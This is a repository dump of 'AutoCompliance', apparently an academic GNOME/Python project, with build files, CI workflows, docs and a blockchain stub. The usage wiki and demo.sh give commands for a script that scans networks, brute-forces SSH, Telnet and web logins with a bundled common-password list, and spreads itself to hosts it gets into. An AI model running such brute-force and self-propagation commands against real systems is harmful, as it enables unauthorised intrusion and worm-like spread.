8 |
9 |
10 |
--------------------------------------------------------------------------------
/SECURITY.md:
--------------------------------------------------------------------------------
1 | # Security Policy
2 |
3 | ## Supported Versions
4 |
5 | | Version | Supported |
6 | | ------- | ------------------ |
7 | | 0.2.0 | :x: |
8 | | 0.1.0 | :x: |
9 | | 0.0.1 | :x: |
10 |
11 |
12 | ## Reporting a Vulnerability
13 | Report as a bug, but format the title with "SECURITY: " at the beggining, try to include a CVE code and link to resources if you can.
14 |
--------------------------------------------------------------------------------
/docs/guidelines/design/index.md:
--------------------------------------------------------------------------------
1 | [Research](../index.md) /
2 |
3 | # Design and Development Documentation
4 | Find all design and development documentation that has been generated for
5 | AutoCompliance below.
6 |
7 | ## Use Cases
8 | Coming soon :)
9 |
10 | ## Workflows
11 | Coming soon :)
12 |
13 | ## Mock-Ups
14 | Coming soon :)
15 |
16 | ## Architecture Block Diagram
17 | Coming soon :)
18 |
19 | ## Sample Business Domains
20 | Coming soon :)
--------------------------------------------------------------------------------
/autocompliance/src/test_files/passwords_list.txt:
--------------------------------------------------------------------------------
1 | 123456
2 | ytrewq
3 | 123456789
4 | password
5 | antisec
6 | princess
7 | 1234567
8 | rockyou
9 | 12345678
10 | abc123
11 | nicole
12 | daniel
13 | ubuntu
14 | monkey
15 | lovely
16 | dualcore
17 | jessica
18 | 654321
19 | michael
20 | ashley
21 | qwerty
22 | 111111
23 | thispasswordwillwork
24 | 000000
25 | tigger
26 | sunshine
27 | chocolate
28 | password1
29 | anotherpassword
30 | soccer
31 | anthony
32 | phreak
--------------------------------------------------------------------------------
/autocompliance/src/test_files/file.txt:
--------------------------------------------------------------------------------
1 | Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor
2 | incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis
3 | nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.
4 | Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore
5 | eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt
6 | in culpa qui officia deserunt mollit anim id est laborum.
--------------------------------------------------------------------------------
/autocompliance/meson.build:
--------------------------------------------------------------------------------
1 | project('autocompliance',
2 | version: '0.1.0',
3 | meson_version: '>= 0.59.0',
4 | default_options: [ 'warning_level=2',
5 | 'werror=false',
6 | ],
7 | )
8 |
9 | i18n = import('i18n')
10 |
11 | gnome = import('gnome')
12 |
13 |
14 |
15 | subdir('data')
16 | subdir('src')
17 | subdir('po')
18 |
19 | gnome.post_install(
20 | glib_compile_schemas: true,
21 | gtk_update_icon_cache: true,
22 | update_desktop_database: true,
23 | )
24 |
--------------------------------------------------------------------------------
/docs/index.md:
--------------------------------------------------------------------------------
1 | # AutoCompliance Documentation and Research
2 | Here you will find everything related to the research and development of the
3 | AutoCompliance solution.
4 | ## [Project Wiki](wiki/index.md)
5 | Go here for general information and usage guidelines.
6 |
7 | ## [Development and Contribution Guidelines](guidelines/index.md)
8 | Go here for information regarding development and contributing to the project.
9 |
10 | ## [Research](research/index.md)
11 | Go here to see the academic work carried out as part of this project.
--------------------------------------------------------------------------------
/autocompliance/data/icons/meson.build:
--------------------------------------------------------------------------------
1 | application_id = 'org.example.App'
2 |
3 | scalable_dir = join_paths('hicolor', 'scalable', 'apps')
4 | install_data(
5 | join_paths(scalable_dir, ('@0@.svg').format(application_id)),
6 | install_dir: join_paths(get_option('datadir'), 'icons', scalable_dir)
7 | )
8 |
9 | symbolic_dir = join_paths('hicolor', 'symbolic', 'apps')
10 | install_data(
11 | join_paths(symbolic_dir, ('@0@-symbolic.svg').format(application_id)),
12 | install_dir: join_paths(get_option('datadir'), 'icons', symbolic_dir)
13 | )
14 |
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/feature_request.md:
--------------------------------------------------------------------------------
1 | ---
2 | name: Feature request
3 | about: Suggest an idea for this project
4 | title: ''
5 | labels: ''
6 | assignees: ''
7 |
8 | ---
9 |
10 | **Is your feature request related to a problem? Please describe.**
11 | A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
12 |
13 | **Describe the solution you'd like**
14 | A clear and concise description of what you want to happen.
15 |
16 | **Describe alternatives you've considered**
17 | A clear and concise description of any alternative solutions or features you've considered.
18 |
19 | **Additional context**
20 | Add any other context or screenshots about the feature request here.
21 |
--------------------------------------------------------------------------------
/autocompliance/src/test_blockchain.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 |
3 | # Author: @andrewk10
4 |
5 | # Importing blockchain for blockchain based functionality
6 | import autocompliance.src.blockchain as blockchain
7 |
8 |
9 | def test_create_blockchain():
10 | """
11 | This function tests the create_blockchain function in the blockchain
12 | script. It uses example arguments to do this stored in strings.py, but
13 | before it does that the bad path is checked by passing in a single argument
14 | with no value to get a runtime error.
15 | """
16 | # Creating blockchain itself.
17 | test_blockchain = blockchain.Blockchain()
18 | # Testing against the genesis block.
19 | assert test_blockchain.get_previous_block()["index"] == 1
20 | assert test_blockchain.get_previous_block()["timestamp"] is not None
21 | assert test_blockchain.get_previous_block()["proof"] == 1
22 | assert test_blockchain.get_previous_block()["previous_hash"] == "0"
23 |
--------------------------------------------------------------------------------
/tests.sh:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env bash
2 | # Pytest local run with coverage and a report exported to HTML
3 | # See; https://coverage.readthedocs.io/en/6.3.2/
4 | coverage run -m pytest --durations=0 -vv -x --log-level=debug
5 | coverage report
6 | coverage html
7 |
8 | # To test individual test files and check test speeds for pruning see and
9 | # uncomment the following.
10 | #pytest --durations=0 -vv -x --log-level=debug src/test_blockchain.py
11 | #pytest --durations=0 -vv -x --log-level=debug src/test_blockchain_delegate.py
12 | #pytest --durations=0 -vv -x --log-level=debug src/test_blockchain_functions.py
13 | #pytest --durations=0 -vv -x --log-level=debug src/test_blockchain_speaker.py
14 | #pytest --durations=0 -vv -x --log-level=debug src/test_demo_functions.py
15 | #pytest --durations=0 -vv -x --log-level=debug src/test_file.py
16 | #pytest --durations=0 -vv -x --log-level=debug src/test_net_propagation.py
17 | #pytest --durations=0 -vv -x --log-level=debug src/test_strings_functions.py
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/bug_report.md:
--------------------------------------------------------------------------------
1 | ---
2 | name: Bug report
3 | about: Create a report to help us improve
4 | title: ''
5 | labels: ''
6 | assignees: ''
7 |
8 | ---
9 |
10 | **Describe the bug**
11 | A clear and concise description of what the bug is.
12 |
13 | **To Reproduce**
14 | Steps to reproduce the behavior:
15 | 1. Go to '...'
16 | 2. Click on '....'
17 | 3. Scroll down to '....'
18 | 4. See error
19 |
20 | **Expected behavior**
21 | A clear and concise description of what you expected to happen.
22 |
23 | **Screenshots**
24 | If applicable, add screenshots to help explain your problem.
25 |
26 | **Desktop (please complete the following information):**
27 | - OS: [e.g. iOS]
28 | - Browser [e.g. chrome, safari]
29 | - Version [e.g. 22]
30 |
31 | **Smartphone (please complete the following information):**
32 | - Device: [e.g. iPhone6]
33 | - OS: [e.g. iOS8.1]
34 | - Browser [e.g. stock browser, safari]
35 | - Version [e.g. 22]
36 |
37 | **Additional context**
38 | Add any other context about the problem here.
39 |
--------------------------------------------------------------------------------
/docs/wiki/index.md:
--------------------------------------------------------------------------------
1 | # AutoCompliance Wiki
2 | Here you will find all the information regarding general usage, reporting bugs,
3 | defects and security issues.
4 |
5 | ## [General Usage](usage/index.md)
6 | This page will teach you how to utilise AutoCompliance as of 06/03/2022
7 |
8 | ## Reporting Bugs / Defects
9 | Follow the steps highlighted below;
10 |
11 | 1. [Template to Fill and Submit](https://github.com/andrewk10/AutoCompliance/issues/new?assignees=&labels=&template=bug_report.md&title=)
12 |
13 | ## Feature Request
14 | Follow the steps highlighted below;
15 |
16 | 1. [Template to Fill and Submit](https://github.com/andrewk10/AutoCompliance/issues/new?assignees=&labels=&template=feature_request.md&title=)
17 |
18 | ## Security Fix
19 | Follow the steps highlighted below;
20 |
21 | 1. [READ THIS FIRST](https://github.com/andrewk10/AutoCompliance/security/policy)
22 |
23 | 2. [And Subsequently Fill this Template and Submit](https://github.com/andrewk10/AutoCompliance/issues/new?assignees=&labels=&template=bug_report.md&title=)
24 |
--------------------------------------------------------------------------------
/autocompliance/src/meson.build:
--------------------------------------------------------------------------------
1 | pkgdatadir = join_paths(get_option('prefix'), get_option('datadir'), meson.project_name())
2 | moduledir = join_paths(pkgdatadir, 'autocompliance')
3 | gnome = import('gnome')
4 |
5 | gnome.compile_resources('autocompliance',
6 | 'autocompliance.gresource.xml',
7 | gresource_bundle: true,
8 | install: true,
9 | install_dir: pkgdatadir,
10 | )
11 |
12 | python = import('python')
13 |
14 | conf = configuration_data()
15 | conf.set('PYTHON', python.find_installation('python3').path())
16 | conf.set('VERSION', meson.project_version())
17 | conf.set('localedir', join_paths(get_option('prefix'), get_option('localedir')))
18 | conf.set('pkgdatadir', pkgdatadir)
19 |
20 | configure_file(
21 | input: 'autocompliance.in',
22 | output: 'autocompliance',
23 | configuration: conf,
24 | install: true,
25 | install_dir: get_option('bindir')
26 | )
27 |
28 | autocompliance_sources = [
29 | '__init__.py',
30 | 'main.py',
31 | 'window.py',
32 | ]
33 |
34 | install_data(autocompliance_sources, install_dir: moduledir)
35 |
--------------------------------------------------------------------------------
/docs/guidelines/index.md:
--------------------------------------------------------------------------------
1 | # Development and Contribution Guidelines [WIP]
2 | Here you will find guidelines on the various ways you can contribute back to
3 | the project. You do not have to follow these guidelines to the letter, but it
4 | would be most recommended that you do.
5 |
6 | ## [Design and Development Documentation](design/index.md) [WIP]
7 | Use Cases, Workflows, Mock-Ups, Architecture Block Diagram, Sample Business
8 | Domains Etc.
9 |
10 | ## Development Environment
11 | PyCharm IDE with native libraries and Python 3.10 installation on a Fedora 35
12 | host machine.
13 |
14 | ## Coding Standards And Best Practices
15 | Following the native PyCharm linter and CodeQL feedback as part of GitHub
16 | Actions.
17 |
18 | ## Build Process [WIP]
19 | Being researched as of 06/03/2022 but so far it's looking like Flatpak for
20 | Linux, .exe for Windows and .app for MacOS.
21 |
22 | ## Contributing to Documentation
23 | Feel free to create a branch and change the respective .md files as you see
24 | fit, just submit a pull request for approval.
--------------------------------------------------------------------------------
/autocompliance/org.example.App.json:
--------------------------------------------------------------------------------
1 | {
2 | "app-id" : "org.example.App",
3 | "runtime" : "org.gnome.Sdk",
4 | "runtime-version" : "master",
5 | "sdk" : "org.gnome.Sdk",
6 | "command" : "autocompliance",
7 | "finish-args" : [
8 | "--share=network",
9 | "--share=ipc",
10 | "--socket=fallback-x11",
11 | "--device=dri",
12 | "--socket=wayland"
13 | ],
14 | "cleanup" : [
15 | "/include",
16 | "/lib/pkgconfig",
17 | "/man",
18 | "/share/doc",
19 | "/share/gtk-doc",
20 | "/share/man",
21 | "/share/pkgconfig",
22 | "*.la",
23 | "*.a"
24 | ],
25 | "modules" : [
26 | {
27 | "name" : "autocompliance",
28 | "builddir" : true,
29 | "buildsystem" : "meson",
30 | "sources" : [
31 | {
32 | "type" : "git",
33 | "url" : "file:///home/andrew/Applications/AutoCompliance/autocompliance"
34 | }
35 | ]
36 | }
37 | ],
38 | "build-options" : {
39 | "env" : { }
40 | }
41 | }
42 |
--------------------------------------------------------------------------------
/autocompliance/org.example.App.json~:
--------------------------------------------------------------------------------
1 | {
2 | "app-id" : "org.example.App",
3 | "runtime" : "org.gnome.Sdk",
4 | "runtime-version" : "master",
5 | "sdk" : "org.gnome.Sdk",
6 | "command" : "autocompliance",
7 | "finish-args" : [
8 | "--share=network",
9 | "--share=ipc",
10 | "--socket=fallback-x11",
11 | "--device=dri",
12 | "--socket=wayland"
13 | ],
14 | "cleanup" : [
15 | "/include",
16 | "/lib/pkgconfig",
17 | "/man",
18 | "/share/doc",
19 | "/share/gtk-doc",
20 | "/share/man",
21 | "/share/pkgconfig",
22 | "*.la",
23 | "*.a"
24 | ],
25 | "modules" : [
26 | {
27 | "name" : "autocompliance",
28 | "builddir" : true,
29 | "buildsystem" : "meson",
30 | "sources" : [
31 | {
32 | "type" : "git",
33 | "url" : "file:///home/andrew/Applications/AutoCompliance/autocompliance"
34 | }
35 | ]
36 | }
37 | ],
38 | "build-options" : {
39 | "env" : { }
40 | }
41 | }
42 |
--------------------------------------------------------------------------------
/autocompliance/src/gtk/help-overlay.ui:
--------------------------------------------------------------------------------
1 |
2 |
3 |
29 |
30 |
--------------------------------------------------------------------------------
/demo.sh:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env bash
2 | # For demo purposes only, runs demo.py
3 |
4 | # Running the propagation script across numerous services (SSH, Web)
5 | echo "Running the propagation script across numerous services (SSH, Web)"
6 | ./autocompliance/src/demo.py -t src/test_files/ip_list_short.txt -p 22,25,80 -u admin -f \
7 | src/test_files/passwords_list_short.txt
8 |
9 | # Running the propagation script just across SSH
10 | echo "Running the propagation script just across SSH"
11 | ./autocompliance/src/demo.py -t src/test_files/ip_list_short.txt -p 22 -u root -f \
12 | src/test_files/passwords_list_short.txt
13 |
14 | # Running the propagation script just across SSH and spreading a specific file.
15 | echo "Running the propagation script just across SSH and spreading a \
16 | specific file"
17 | ./autocompliance/src/demo.py -t src/test_files/ip_list_short.txt -p 22 -u root -f \
18 | src/test_files/passwords_list_short.txt -d src/test_files/file.txt
19 |
20 | # Running the propagation script across SSH but acquiring IPs through a local
21 | # scan and then subsequently self propagating.
22 | echo "Running the propagation script across SSH but acquiring IPs through a \
23 | local scan and then subsequently self propagating."
24 | ./autocompliance/src/demo.py -L -p 22 -u root -f src/test_files/passwords_list_short.txt -P
25 |
--------------------------------------------------------------------------------
/.github/workflows/python-app-main.yml:
--------------------------------------------------------------------------------
1 | # This workflow will install Python dependencies, run tests and lint with a single version of Python
2 | # For more information see: https://help.github.com/actions/language-and-framework-guides/using-python-with-github-actions
3 |
4 | name: Python Application - Main
5 |
6 | on:
7 | push:
8 | branches: [ main ]
9 | pull_request:
10 | branches: [ main ]
11 |
12 | jobs:
13 | build:
14 |
15 | runs-on: ubuntu-latest
16 |
17 | steps:
18 | - uses: actions/checkout@v2
19 | - name: Set up Python 3.10
20 | uses: actions/setup-python@v2
21 | with:
22 | python-version: "3.10"
23 | - name: Install dependencies
24 | run: |
25 | python -m pip install --upgrade pip
26 | pip install flake8 pytest ipykernel paramiko scapy requests
27 | if [ -f requirements.txt ]; then pip install -r requirements.txt; fi
28 | - name: Lint with flake8
29 | run: |
30 | # stop the build if there are Python syntax errors or undefined names
31 | flake8 . --count --select=E9,F63,F7,F82 --show-source --statistics
32 | # exit-zero treats all errors as warnings. The GitHub editor is 127 chars wide
33 | flake8 . --count --exit-zero --max-complexity=10 --max-line-length=127 --statistics
34 | - name: Test with pytest
35 | run: |
36 | pytest
37 |
--------------------------------------------------------------------------------
/autocompliance/src/window.ui:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | 600
6 | 300
7 |
8 |
16 |
17 |
18 |
19 |
35 |
36 |
--------------------------------------------------------------------------------
/autocompliance/data/meson.build:
--------------------------------------------------------------------------------
1 | desktop_file = i18n.merge_file(
2 | input: 'org.example.App.desktop.in',
3 | output: 'org.example.App.desktop',
4 | type: 'desktop',
5 | po_dir: '../po',
6 | install: true,
7 | install_dir: join_paths(get_option('datadir'), 'applications')
8 | )
9 |
10 | desktop_utils = find_program('desktop-file-validate', required: false)
11 | if desktop_utils.found()
12 | test('Validate desktop file', desktop_utils,
13 | args: [desktop_file]
14 | )
15 | endif
16 |
17 | appstream_file = i18n.merge_file(
18 | input: 'org.example.App.appdata.xml.in',
19 | output: 'org.example.App.appdata.xml',
20 | po_dir: '../po',
21 | install: true,
22 | install_dir: join_paths(get_option('datadir'), 'appdata')
23 | )
24 |
25 | appstream_util = find_program('appstream-util', required: false)
26 | if appstream_util.found()
27 | test('Validate appstream file', appstream_util,
28 | args: ['validate', appstream_file]
29 | )
30 | endif
31 |
32 | install_data('org.example.App.gschema.xml',
33 | install_dir: join_paths(get_option('datadir'), 'glib-2.0/schemas')
34 | )
35 |
36 | compile_schemas = find_program('glib-compile-schemas', required: false)
37 | if compile_schemas.found()
38 | test('Validate schema file', compile_schemas,
39 | args: ['--strict', '--dry-run', meson.current_source_dir()]
40 | )
41 | endif
42 |
43 | subdir('icons')
44 |
--------------------------------------------------------------------------------
/.github/workflows/python-app-develop.yml:
--------------------------------------------------------------------------------
1 | # This workflow will install Python dependencies, run tests and lint with a single version of Python
2 | # For more information see: https://help.github.com/actions/language-and-framework-guides/using-python-with-github-actions
3 |
4 | name: Python Application - Develop
5 |
6 | on:
7 | push:
8 | branches: [ develop ]
9 | pull_request:
10 | branches: [ develop ]
11 |
12 | jobs:
13 | build:
14 |
15 | runs-on: ubuntu-latest
16 |
17 | steps:
18 | - uses: actions/checkout@v2
19 | - name: Set up Python 3.10
20 | uses: actions/setup-python@v2
21 | with:
22 | python-version: "3.10"
23 | - name: Install dependencies
24 | run: |
25 | python -m pip install --upgrade pip
26 | pip install flake8 pytest ipykernel paramiko scapy requests
27 | if [ -f requirements.txt ]; then pip install -r requirements.txt; fi
28 | - name: Lint with flake8
29 | run: |
30 | # stop the build if there are Python syntax errors or undefined names
31 | flake8 . --count --select=E9,F63,F7,F82 --show-source --statistics
32 | # exit-zero treats all errors as warnings. The GitHub editor is 127 chars wide
33 | flake8 . --count --exit-zero --max-complexity=10 --max-line-length=127 --statistics
34 | - name: Test with pytest
35 | run: |
36 | pytest
37 |
--------------------------------------------------------------------------------
/.github/workflows/python-app-sprint.yml:
--------------------------------------------------------------------------------
1 | # This workflow will install Python dependencies, run tests and lint with a single version of Python
2 | # For more information see: https://help.github.com/actions/language-and-framework-guides/using-python-with-github-actions
3 |
4 | name: Python Application - Sprint
5 |
6 | on:
7 | push:
8 | branches: [ sprint6 ]
9 | pull_request:
10 | branches: [ sprint6 ]
11 |
12 | jobs:
13 | build:
14 |
15 | runs-on: ubuntu-latest
16 |
17 | steps:
18 | - uses: actions/checkout@v2
19 | - name: Set up Python 3.10
20 | uses: actions/setup-python@v2
21 | with:
22 | python-version: "3.10"
23 | - name: Install dependencies
24 | run: |
25 | python -m pip install --upgrade pip
26 | pip install flake8 pytest ipykernel paramiko scapy requests
27 | if [ -f requirements.txt ]; then pip install -r requirements.txt; fi
28 | - name: Lint with flake8
29 | run: |
30 | # stop the build if there are Python syntax errors or undefined names
31 | flake8 . --count --select=E9,F63,F7,F82 --show-source --statistics
32 | # exit-zero treats all errors as warnings. The GitHub editor is 127 chars wide
33 | flake8 . --count --exit-zero --max-complexity=10 --max-line-length=127 --statistics
34 | - name: Test with pytest
35 | run: |
36 | pytest
37 |
--------------------------------------------------------------------------------
/.github/workflows/python-app-feature.yml:
--------------------------------------------------------------------------------
1 | # This workflow will install Python dependencies, run tests and lint with a single version of Python
2 | # For more information see: https://help.github.com/actions/language-and-framework-guides/using-python-with-github-actions
3 |
4 | name: Python Application - Feature
5 |
6 | on:
7 | push:
8 | branches: [ 24-initial-work-on-the-gui-elements ]
9 | pull_request:
10 | branches: [ 24-initial-work-on-the-gui-elements ]
11 |
12 | jobs:
13 | build:
14 |
15 | runs-on: ubuntu-latest
16 |
17 | steps:
18 | - uses: actions/checkout@v2
19 | - name: Set up Python 3.10
20 | uses: actions/setup-python@v2
21 | with:
22 | python-version: "3.10"
23 | - name: Install dependencies
24 | run: |
25 | python -m pip install --upgrade pip
26 | pip install flake8 pytest ipykernel paramiko scapy requests
27 | if [ -f requirements.txt ]; then pip install -r requirements.txt; fi
28 | - name: Lint with flake8
29 | run: |
30 | # stop the build if there are Python syntax errors or undefined names
31 | flake8 . --count --select=E9,F63,F7,F82 --show-source --statistics
32 | # exit-zero treats all errors as warnings. The GitHub editor is 127 chars wide
33 | flake8 . --count --exit-zero --max-complexity=10 --max-line-length=127 --statistics
34 | - name: Test with pytest
35 | run: |
36 | pytest
37 |
--------------------------------------------------------------------------------
/autocompliance/src/autocompliance.in:
--------------------------------------------------------------------------------
1 | #!@PYTHON@
2 |
3 | # autocompliance.in
4 | #
5 | # Copyright 2022 Andrew
6 | #
7 | # This program is free software: you can redistribute it and/or modify
8 | # it under the terms of the GNU General Public License as published by
9 | # the Free Software Foundation, either version 3 of the License, or
10 | # (at your option) any later version.
11 | #
12 | # This program is distributed in the hope that it will be useful,
13 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
14 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
15 | # GNU General Public License for more details.
16 | #
17 | # You should have received a copy of the GNU General Public License
18 | # along with this program. If not, see .
19 |
20 | import os
21 | import sys
22 | import signal
23 | import locale
24 | import gettext
25 |
26 | VERSION = '@VERSION@'
27 | pkgdatadir = '@pkgdatadir@'
28 | localedir = '@localedir@'
29 |
30 | sys.path.insert(1, pkgdatadir)
31 | signal.signal(signal.SIGINT, signal.SIG_DFL)
32 | locale.bindtextdomain('autocompliance', localedir)
33 | locale.textdomain('autocompliance')
34 | gettext.install('autocompliance', localedir)
35 |
36 | if __name__ == '__main__':
37 | import gi
38 |
39 | from gi.repository import Gio
40 | resource = Gio.Resource.load(os.path.join(pkgdatadir, 'autocompliance.gresource'))
41 | resource._register()
42 |
43 | from autocompliance import main
44 | sys.exit(main.main(VERSION))
45 |
--------------------------------------------------------------------------------
/autocompliance/data/icons/hicolor/symbolic/apps/org.example.App-symbolic.svg:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/docs/wiki/usage/index.md:
--------------------------------------------------------------------------------
1 | [Wiki](../index.md) /
2 | # General Usage
3 | A manual of sorts for AutoCompliance. Note that the only functionality that
4 | exists at the moment is propagation across specific ports and services.
5 |
6 | ## Running the Propagation Script
7 | The main.py script will automate the process of discovering weak usernames and
8 | passwords being used for services running on a host. The script will read a
9 | file containing a list of IP addresses. For each IP address in the list the
10 | script will scan the ports on that host, and attempt a login for detected
11 | services.
12 |
13 | The script will take in the following parameters:
14 |
15 | | Parameter | Purpose |
16 | |-----------|-------------------------------------------------------|
17 | | -t | Filename for a file containing a list of IP addresses |
18 | | -p | Ports to scan on the target host |
19 | | -u | A username for login through services |
20 | | -f | Filename for a file containing a list of passwords |
21 | | -d | Specify a specific file for propagation |
22 | | -L | Perform scan on local networks |
23 | | -P | Propagate the script itself and password file |
24 |
25 | Example usage would look like this:
26 | ```
27 | # Running the propagation script across numerous services (SSH, Telnet, Web)
28 | ./main.py -t src/test_files/ip_list.txt -p 22,23,25,80 -u admin -f src/test_files/passwords_list.txt
29 |
30 | # Running the propagation script just across SSH
31 | ./main.py -t src/test_files/ip_list.txt -p 22 -u root -f src/test_files/passwords_list.txt
32 |
33 | # Running the propagation script just across SSH and spreading a specific file.
34 | ./main.py -t src/test_files/ip_list.txt -p 22 -u root -f src/test_files/passwords_list.txt -d src/test_files/file.txt
35 |
36 | # Running the propagation script across SSH and Telnet but acquiring IPs through a local scan and then subsequently self propagating.
37 | ./main.py -L -p 22,23 -u root -f src/test_files/passwords_list.txt -P
38 | ```
--------------------------------------------------------------------------------
/autocompliance/src/blockchain.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 |
3 | # Author: @andrewk10
4 |
5 | # This code is the blockchain implementation for AutoCompliance
6 |
7 | # Importing datetime for timestamps.
8 | import datetime
9 | # Importing strings for use of the external strings resources.
10 | # import autocompliance.src.strings as strings
11 | # Importing strings_functions for string building functions.
12 | # import autocompliance.src.strings_functions as strings_functions
13 |
14 |
15 | class Blockchain:
16 | """
17 | This class defines the blockchain for AutoCompliance.
18 | """
19 | def __init__(self):
20 | # The blockchain itself.
21 | self.chain = []
22 | # Adds the first block to the chain.
23 | self.create_blockchain(proof=1, previous_hash='0')
24 | self.number_of_validators = 0
25 | self.consensus_context = 0
26 | self.speaker_timeout = 0
27 | self.validator = 0
28 | # Set to seconds
29 | self.block_time = 15
30 | self.host_ip = None
31 |
32 | def create_blockchain(self, proof, previous_hash):
33 | """
34 | This method creates the blockchain by adding the genesis block to the
35 | chain.
36 | """
37 | block = {
38 | "index": len(self.chain) + 1,
39 | "timestamp": str(datetime.datetime.now()),
40 | "proof": proof,
41 | "previous_hash": previous_hash
42 | }
43 |
44 | self.chain.append(block)
45 | return block
46 |
47 | def get_previous_block(self):
48 | last_block = self.chain[-1]
49 | return last_block
50 |
51 | def set_speaker_timeout(self):
52 | self.speaker_timeout = pow(2, self.chain.index(self.validator) + 1) * \
53 | self.speaker_timeout
54 |
55 | def set_validator(self):
56 | self.validator = (self.chain.__len__() -
57 | self.chain.index(self.validator)) % \
58 | self.number_of_validators
59 |
60 | def initialise_consensus_information(self):
61 | self.consensus_context = self.number_of_validators - \
62 | ((self.number_of_validators-1)/3)
63 |
--------------------------------------------------------------------------------
/autocompliance/src/window.py:
--------------------------------------------------------------------------------
1 | # window.py
2 | #
3 | # Copyright 2022 Andrew
4 | #
5 | # This program is free software: you can redistribute it and/or modify
6 | # it under the terms of the GNU General Public License as published by
7 | # the Free Software Foundation, either version 3 of the License, or
8 | # (at your option) any later version.
9 | #
10 | # This program is distributed in the hope that it will be useful,
11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
13 | # GNU General Public License for more details.
14 | #
15 | # You should have received a copy of the GNU General Public License
16 | # along with this program. If not, see .
17 |
18 | from gi.repository import Gtk
19 |
20 |
21 | @Gtk.Template(resource_path='/org/example/App/window.ui')
22 | class AutocomplianceWindow(Gtk.ApplicationWindow):
23 | __gtype_name__ = 'AutocomplianceWindow'
24 |
25 | label = Gtk.Template.Child()
26 |
27 | def __init__(self, **kwargs):
28 | super().__init__(**kwargs)
29 | self.set_title("AutoCompliance")
30 |
31 | box = Gtk.VBox()
32 | self.set_child(box)
33 |
34 | resource_limiting_btn = Gtk.Button(label='Resource Limiting')
35 | resource_limiting_btn.connect('clicked', lambda x: self.close())
36 | # box.(resource_limiting_btn)
37 |
38 | specify_domain_details_btn = Gtk.Button(label='Specify Domain Details')
39 | specify_domain_details_btn.connect('clicked', lambda x: self.close())
40 | # self.add(specify_domain_details_btn)
41 |
42 | add_domain_devices_btn = Gtk.Button(label='Add Domain Devices')
43 | add_domain_devices_btn.connect('clicked', lambda x: self.close())
44 | # self.add(add_domain_devices_btn)
45 |
46 | provide_brute_force_propagation_information_btn = Gtk.Button(label='Provide Brute-Force Propagation Information')
47 | provide_brute_force_propagation_information_btn.connect('clicked', lambda x: self.close())
48 | # self.add(provide_brute_force_propagation_information_btn)
49 |
50 |
51 |
52 |
53 | class AboutDialog(Gtk.AboutDialog):
54 |
55 | def __init__(self, parent):
56 | Gtk.AboutDialog.__init__(self)
57 | self.props.program_name = 'autocompliance'
58 | self.props.version = "0.1.0"
59 | self.props.authors = ['Andrew']
60 | self.props.copyright = '2022 Andrew'
61 | self.props.logo_icon_name = 'org.example.App'
62 | self.props.modal = True
63 | self.set_transient_for(parent)
64 |
65 |
--------------------------------------------------------------------------------
/.github/workflows/codeql-analysis-main.yml:
--------------------------------------------------------------------------------
1 | # For most projects, this workflow file will not need changing; you simply need
2 | # to commit it to your repository.
3 | #
4 | # You may wish to alter this file to override the set of languages analyzed,
5 | # or to provide custom queries or build logic.
6 | #
7 | # ******** NOTE ********
8 | # We have attempted to detect the languages in your repository. Please check
9 | # the `language` matrix defined below to confirm you have the correct set of
10 | # supported CodeQL languages.
11 | #
12 | name: "CodeQL - Main"
13 |
14 | on:
15 | push:
16 | branches: [ main ]
17 | pull_request:
18 | # The branches below must be a subset of the branches above
19 | branches: [ main ]
20 | schedule:
21 | - cron: '34 22 * * 4'
22 |
23 | jobs:
24 | analyze:
25 | name: Analyze
26 | runs-on: ubuntu-latest
27 | permissions:
28 | actions: read
29 | contents: read
30 | security-events: write
31 |
32 | strategy:
33 | fail-fast: false
34 | matrix:
35 | language: [ python ]
36 | # CodeQL supports [ 'cpp', 'csharp', 'go', 'java', 'javascript', 'python', 'ruby' ]
37 | # Learn more about CodeQL language support at https://git.io/codeql-language-support
38 |
39 | steps:
40 | - name: Checkout repository
41 | uses: actions/checkout@v2
42 |
43 | # Initializes the CodeQL tools for scanning.
44 | - name: Initialize CodeQL
45 | uses: github/codeql-action/init@v1
46 | with:
47 | languages: ${{ matrix.language }}
48 | # If you wish to specify custom queries, you can do so here or in a config file.
49 | # By default, queries listed here will override any specified in a config file.
50 | # Prefix the list here with "+" to use these queries and those in the config file.
51 | # queries: ./path/to/local/query, your-org/your-repo/queries@main
52 |
53 | # Autobuild attempts to build any compiled languages (C/C++, C#, or Java).
54 | # If this step fails, then you should remove it and run the build manually (see below)
55 | - name: Autobuild
56 | uses: github/codeql-action/autobuild@v1
57 |
58 | # ℹ️ Command-line programs to run using the OS shell.
59 | # 📚 https://git.io/JvXDl
60 |
61 | # ✏️ If the Autobuild fails above, remove it and uncomment the following three lines
62 | # and modify them (or add more) to build your code if your project
63 | # uses a compiled language
64 |
65 | #- run: |
66 | # make bootstrap
67 | # make release
68 |
69 | - name: Perform CodeQL Analysis
70 | uses: github/codeql-action/analyze@v1
71 |
--------------------------------------------------------------------------------
/.github/workflows/codeql-analysis-sprint.yml:
--------------------------------------------------------------------------------
1 | # For most projects, this workflow file will not need changing; you simply need
2 | # to commit it to your repository.
3 | #
4 | # You may wish to alter this file to override the set of languages analyzed,
5 | # or to provide custom queries or build logic.
6 | #
7 | # ******** NOTE ********
8 | # We have attempted to detect the languages in your repository. Please check
9 | # the `language` matrix defined below to confirm you have the correct set of
10 | # supported CodeQL languages.
11 | #
12 | name: "CodeQL - Sprint"
13 |
14 | on:
15 | push:
16 | branches: [ sprint6 ]
17 | pull_request:
18 | # The branches below must be a subset of the branches above
19 | branches: [ sprint6 ]
20 | schedule:
21 | - cron: '34 22 * * 4'
22 |
23 | jobs:
